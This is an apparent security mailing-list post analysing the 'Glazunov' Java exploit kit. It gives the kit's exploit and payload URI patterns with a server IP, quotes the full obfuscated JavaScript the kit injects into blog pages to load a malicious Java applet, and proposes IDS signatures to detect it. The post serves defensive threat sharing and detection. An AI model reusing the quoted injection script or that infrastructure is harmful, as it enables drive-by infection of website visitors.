[Emerging-Sigs] "Glazunov" injection update

Chris Wakelin c.d.wakelin at reading.ac.uk
Thu Nov 22 06:43:09 HAST 2012


I've just had a client compromised via Java from our old friend
"Glazunov" (my name based on the hosting provider on I originally saw
the exploit files - anybody with a better name please say!).

This is the kit that inserts malicious, randomly-obfuscated javascript
into web-pages (typically blogs) that points to one-time-only,
shortlived randomised URLs for a Java exploit and its payload.
Subsequent requests from the same IP do not see the injection (I'm
guessing its using a rogue Wordpress plugin or Apache module).

The payload URI is literally encrypted using a key in the Java exploit
jar, using the same method as the kit I've been calling "Sibhost" (see
http://lists.emergingthreats.net/pipermail/emerging-sigs/2012-September/020384.html).

Previously, the Java exploit URI would be four random digits, and the
payload URI would be a different four digits plus "1" at the end.

Now, it appears to be five random digits for the payload, and ten random
digits "/" five random digits for the exploit, e.g.:

208.87.241.165 /4526020630/17108
208.87.241.165 /18012

208.87.241.165 /1680107170/66021
208.87.241.165 /12022

208.87.241.165 /6183807484/23919
208.87.241.165 /14892

The injected Javascript looks like (function and variable names and the
charcode displacement will vary as well as the encoded URIs):

> <body class="page-work"><body><script language="javascript"> var ws=new Date(); ws.setDate(12+ws.getDate()); document.cookie="stats=446501053769c06c565094b26d26e8ef; path=/; expires="+ ws.toGMTString(); gbt=4*1; nwf="lxxt>33"; </script><script language="javascript">var lktjt = function(gqnbwws){var jse = function(vni)
> {var kow, yaw, i; var qxt=""; kow = vni.length; for (i = 0; i < kow; ++i) {yaw = vni.charCodeAt(i)-gbt;qxt = qxt + String.fromCharCode(yaw);} return(qxt); }
> 
> var cqwhc=document.createElement(jse("ettpix"));cqwhc.setAttribute(jse("gshi"), jse("lujfl}pgf2r}yihov}qetpzkqnjz2gpeww"));cqwhc.setAttribute(jse("evglmzi"), " "+jse(nwf+"64<2<;268525:9><4<435:<454;5;43::465"));cqwhc.setAttribute(jse("{mhxl"), "1");cqwhc.setAttribute(jse("limklx"), "1");var xwdjbp=document.createElement(jse("teveq"));xwdjbp.setAttribute(jse("reqi"),jse("k{itpv"));xwdjbp.setAttribute(jse("zepyi"),jse("h=66hh4=75e67h8h<h6446h4;6e<g66=j6h77h9f9j4eh4h49h9h664h64f48h"));cqwhc.appendChild(xwdjbp);document.body.appendChild(cqwhc); } ;
> lktjt(1);</script></body>

Here's an update to the ET sig:

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET CURRENT_EVENTS
probable malicious Glazunov Javascript injection";
flow:established,from_server; content:"(|22|"; content:"|22|))|3b|";
distance:64; within:68; content:")|3b|</script></body>"; within:200;
fast_pattern; flowbits:set,et.exploitkitlanding; classtype:bad-unknown;
sid:2014753; rev:3;)

and two more sigs to match the Java requests (I'm not 100% sure of the
performance, but I've been running versions of these to match the old
URIs for quite a while, albeit with no recent hits).

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET CURRENT_EVENTS
Possible Glazunov Java exploit request /10-/5-digit";
flow:established,to_server; content:"|29 20|Java/"; http_header;
urilen:17; pcre:"/^\/\d{10}\/\d{5}$/U";
flowbits:set,et.exploitkitlanding; classtype:trojan-activity; sid:xxxx;
rev:1;)

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET CURRENT_EVENTS
Possible Glazunov Java payload request /5-digit";
flow:established,to_server; content:"|29 20|Java/"; http_header;
urilen:6; pcre:"/^\/\d{5}$/U"; flowbits:set,et.exploitkitlanding;
classtype:trojan-activity; sid:xxxx; rev:1;)

Best Wishes,
Chris

-- 
--+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+-
Christopher Wakelin,                           c.d.wakelin at reading.ac.uk
IT Services Centre, The University of Reading,  Tel: +44 (0)118 378 2908
Whiteknights, Reading, RG6 6AF, UK              Fax: +44 (0)118 975 3094


More information about the Emerging-sigs mailing list